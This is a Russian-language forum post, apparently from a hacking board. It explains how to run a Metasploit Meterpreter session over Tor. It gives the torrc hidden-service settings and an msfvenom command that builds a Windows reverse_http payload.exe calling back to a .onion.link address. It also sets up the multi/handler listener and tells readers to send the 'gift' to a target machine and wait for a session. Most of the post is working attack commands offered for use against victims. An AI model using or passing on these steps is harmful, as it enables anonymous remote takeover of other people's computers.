Meterpreter через TOR [Простое решение]
HlinkУголовно наказуемо! Статья 272.
Доброго времени суток форумчане!
Эта тема для тех кто искал но не находил решение вопроса - а как же пустить сессию meterpreter через сеть тор
Требования:
- Metasploit
- tor (Expert Bundle)
- Созданный сайт в сети tor
- Не много терпения и капельку мозгов
Устанавливаем Metasploit если его еще нету!
Скачиваем tor:
Bash:
apt install tor
Заходим в файл конфигурации "torrc":
Bash:
nano /etc/tor/torrc
Находим и раскомментируем строчки до вида:
Код:
HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:9999
Перезапускаем сервис:
Bash:
sudo service tor restart
Узнаем полученый домен:
Bash:
sudo cat /var/lib/tor/hidden_service/hostname
Я думаю что для многих понятно что этим мы создали свой сайт в сети tor.
Теперь перейдем к metasploit'у.
Создадим наш вредоносный полезный файл:
Bash:
msfvenom -p windows/meterpreter/reverse_http LHOST=*******************.onion.link LPORT=80 -o payload.exe -f exe
Вместо звёздочек вводим полученную нами .onion ссылку.
Важно что бы ссылка заканчивалась на .onion.link
СПОЙЛЕР: LINK
Запустим слушателя:
Bash:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_http set LHOST 192.168.1.1 (Не обязательно что будет такой же ) set LPORT 9999 exploit
Отправляем наш подарок на машину и ждем сессию.
Надеюсь что тема хоть кому нибудь пригодиться)